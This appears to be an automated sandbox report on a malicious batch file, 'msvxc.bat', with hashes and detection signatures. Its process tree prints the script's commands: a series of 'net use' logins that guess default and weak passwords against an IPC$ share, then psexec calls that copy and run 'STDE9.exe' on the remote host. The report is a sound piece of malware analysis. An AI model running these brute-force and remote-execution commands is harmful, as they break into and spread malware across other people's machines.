91639c206da158a13527e6436fc3bc149bb1ce531e0add94f0a256eae6918ea7

Analysis

max time kernel
30s
max time network
34s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
11/05/2023, 15:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

msvxc.bat
Size

1KB
MD5

c6359a6b2cf7858087f482a17b624238
SHA1

bbe518ba66ed1454c617c01506d8a27b7b3d507a
SHA256

df2631e89eedd06b94f9309598a23f4b833645c1ed1617c0ab97ff0ff9423f86
SHA512

1de3e018054dff10012e948b4a707fdd20dbabe63cb10d0a97ae6fbba6856316c90d53cef4e70c62fc28371021407d46ee2aa136b1e0933f131a7f2fd489f9e6

Score

7^/10

upx

Malware Config

Signatures

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral3/memory/1204-54-0x0000000000400000-0x0000000000437000-memory.dmp	upx
behavioral3/memory/1204-55-0x0000000000400000-0x0000000000437000-memory.dmp	upx
behavioral3/memory/1196-56-0x0000000000400000-0x0000000000437000-memory.dmp	upx
behavioral3/memory/272-57-0x0000000000400000-0x0000000000437000-memory.dmp	upx

Runs net.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 3 IoCs

pid	Process
1204	psexec.exe
1196	psexec.exe
272	psexec.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2000 wrote to memory of 1944	2000	cmd.exe	28
PID 2000 wrote to memory of 1944	2000	cmd.exe	28
PID 2000 wrote to memory of 1944	2000	cmd.exe	28
PID 2000 wrote to memory of 1912	2000	cmd.exe	29
PID 2000 wrote to memory of 1912	2000	cmd.exe	29
PID 2000 wrote to memory of 1912	2000	cmd.exe	29
PID 2000 wrote to memory of 932	2000	cmd.exe	31
PID 2000 wrote to memory of 932	2000	cmd.exe	31
PID 2000 wrote to memory of 932	2000	cmd.exe	31
PID 2000 wrote to memory of 1756	2000	cmd.exe	30
PID 2000 wrote to memory of 1756	2000	cmd.exe	30
PID 2000 wrote to memory of 1756	2000	cmd.exe	30
PID 2000 wrote to memory of 1712	2000	cmd.exe	32
PID 2000 wrote to memory of 1712	2000	cmd.exe	32
PID 2000 wrote to memory of 1712	2000	cmd.exe	32
PID 2000 wrote to memory of 1880	2000	cmd.exe	33
PID 2000 wrote to memory of 1880	2000	cmd.exe	33
PID 2000 wrote to memory of 1880	2000	cmd.exe	33
PID 2000 wrote to memory of 588	2000	cmd.exe	34
PID 2000 wrote to memory of 588	2000	cmd.exe	34
PID 2000 wrote to memory of 588	2000	cmd.exe	34
PID 2000 wrote to memory of 524	2000	cmd.exe	35
PID 2000 wrote to memory of 524	2000	cmd.exe	35
PID 2000 wrote to memory of 524	2000	cmd.exe	35
PID 2000 wrote to memory of 1952	2000	cmd.exe	36
PID 2000 wrote to memory of 1952	2000	cmd.exe	36
PID 2000 wrote to memory of 1952	2000	cmd.exe	36
PID 2000 wrote to memory of 548	2000	cmd.exe	37
PID 2000 wrote to memory of 548	2000	cmd.exe	37
PID 2000 wrote to memory of 548	2000	cmd.exe	37
PID 2000 wrote to memory of 1764	2000	cmd.exe	38
PID 2000 wrote to memory of 1764	2000	cmd.exe	38
PID 2000 wrote to memory of 1764	2000	cmd.exe	38
PID 2000 wrote to memory of 1740	2000	cmd.exe	39
PID 2000 wrote to memory of 1740	2000	cmd.exe	39
PID 2000 wrote to memory of 1740	2000	cmd.exe	39
PID 2000 wrote to memory of 1780	2000	cmd.exe	40
PID 2000 wrote to memory of 1780	2000	cmd.exe	40
PID 2000 wrote to memory of 1780	2000	cmd.exe	40
PID 2000 wrote to memory of 1708	2000	cmd.exe	41
PID 2000 wrote to memory of 1708	2000	cmd.exe	41
PID 2000 wrote to memory of 1708	2000	cmd.exe	41
PID 2000 wrote to memory of 332	2000	cmd.exe	42
PID 2000 wrote to memory of 332	2000	cmd.exe	42
PID 2000 wrote to memory of 332	2000	cmd.exe	42
PID 2000 wrote to memory of 472	2000	cmd.exe	43
PID 2000 wrote to memory of 472	2000	cmd.exe	43
PID 2000 wrote to memory of 472	2000	cmd.exe	43
PID 2000 wrote to memory of 1732	2000	cmd.exe	44
PID 2000 wrote to memory of 1732	2000	cmd.exe	44
PID 2000 wrote to memory of 1732	2000	cmd.exe	44
PID 2000 wrote to memory of 1744	2000	cmd.exe	45
PID 2000 wrote to memory of 1744	2000	cmd.exe	45
PID 2000 wrote to memory of 1744	2000	cmd.exe	45
PID 2000 wrote to memory of 580	2000	cmd.exe	46
PID 2000 wrote to memory of 580	2000	cmd.exe	46
PID 2000 wrote to memory of 580	2000	cmd.exe	46
PID 2000 wrote to memory of 1776	2000	cmd.exe	47
PID 2000 wrote to memory of 1776	2000	cmd.exe	47
PID 2000 wrote to memory of 1776	2000	cmd.exe	47
PID 2000 wrote to memory of 1132	2000	cmd.exe	48
PID 2000 wrote to memory of 1132	2000	cmd.exe	48
PID 2000 wrote to memory of 1132	2000	cmd.exe	48
PID 2000 wrote to memory of 1164	2000	cmd.exe	49

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\msvxc.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2000
- C:\Windows\system32\net.exe
  net use \\\ipc$ "" /user:Administrator
  2⤵
  PID:1944
- C:\Windows\system32\net.exe
  net use \\\ipc$ "" /user:administrator
  2⤵
  PID:1912
- C:\Windows\system32\net.exe
  net use \\\ipc$ "" /user:Admin
  2⤵
  PID:1756
- C:\Windows\system32\net.exe
  net use \\\ipc$ "" /user:admin
  2⤵
  PID:932
- C:\Windows\system32\net.exe
  net use \\\ipc$ "" /user:guest
  2⤵
  PID:1712
- C:\Windows\system32\net.exe
  net use \\\ipc$ "" /user:Guest
  2⤵
  PID:1880
- C:\Windows\system32\net.exe
  net use \\\ipc$ "" /user:temp
  2⤵
  PID:588
- C:\Windows\system32\net.exe
  net use \\\ipc$ "" /user:Temp
  2⤵
  PID:524
- C:\Windows\system32\net.exe
  net use \\\ipc$ "" /user:root
  2⤵
  PID:1952
- C:\Windows\system32\net.exe
  net use \\\ipc$ "" /user:ROOT
  2⤵
  PID:548
- C:\Windows\system32\net.exe
  net use \\\ipc$ "12345" /user:Administrator
  2⤵
  PID:1764
- C:\Windows\system32\net.exe
  net use \\\ipc$ "zzzzz" /user:Administrator
  2⤵
  PID:1740
- C:\Windows\system32\net.exe
  net use \\\ipc$ "xxxxx" /user:Administrator
  2⤵
  PID:1780
- C:\Windows\system32\net.exe
  net use \\\ipc$ "Admin" /user:Administrator
  2⤵
  PID:1708
- C:\Windows\system32\net.exe
  net use \\\ipc$ "guest" /user:guest
  2⤵
  PID:332
- C:\Windows\system32\net.exe
  net use \\\ipc$ "2002" /user:Administrator
  2⤵
  PID:472
- C:\Windows\system32\net.exe
  net use \\\ipc$ "abc123" /user:Administrator
  2⤵
  PID:1732
- C:\Windows\system32\net.exe
  net use \\\ipc$ "temp" /user:Administrator
  2⤵
  PID:1744
- C:\Windows\system32\net.exe
  net use \\\ipc$ "Administrator" /user:Administrator
  2⤵
  PID:580
- C:\Windows\system32\net.exe
  net use \\\ipc$ "login" /user:Administrator
  2⤵
  PID:1776
- C:\Windows\system32\net.exe
  net use \\\ipc$ "root" /user:root
  2⤵
  PID:1132
- C:\Windows\system32\net.exe
  net use \\\ipc$ "temp" /user:Temp
  2⤵
  PID:1164
- C:\Windows\system32\net.exe
  net use \\\ipc$ "root" /user:Administrator
  2⤵
  PID:1352
- C:\Windows\system32\net.exe
  net use \\\ipc$ "adm" /user:Administrator
  2⤵
  PID:564
- C:\Windows\system32\net.exe
  net use \\\ipc$ "2003" /user:Administrator
  2⤵
  PID:1032
- C:\Windows\system32\net.exe
  net use \\\ipc$ "default" /user:Administrator
  2⤵
  PID:544
- C:\Windows\system32\net.exe
  net use \\\ipc$ "student" /user:student
  2⤵
  PID:1640
- C:\Windows\system32\net.exe
  net use \\\ipc$ "admin" /user:Admin
  2⤵
  PID:1168
- C:\Windows\system32\net.exe
  net use \\\ipc$ "admin" /user:admin
  2⤵
  PID:1684
- C:\Users\Admin\AppData\Local\Temp\psexec.exe
  psexec \\ attrib.exe -r STDE9.exe
  2⤵
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  PID:1204
- C:\Users\Admin\AppData\Local\Temp\psexec.exe
  psexec \\ -f -c -d STDE9.exe -o
  2⤵
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  PID:1196
- C:\Users\Admin\AppData\Local\Temp\psexec.exe
  psexec \\ -d STDE9.exe -o
  2⤵
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  PID:272

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/272-57-0x0000000000400000-0x0000000000437000-memory.dmp

Filesize
220KB

Download
memory/1196-56-0x0000000000400000-0x0000000000437000-memory.dmp

Filesize
220KB

Download
memory/1204-54-0x0000000000400000-0x0000000000437000-memory.dmp

Filesize
220KB

Download
memory/1204-55-0x0000000000400000-0x0000000000437000-memory.dmp

Filesize
220KB

Download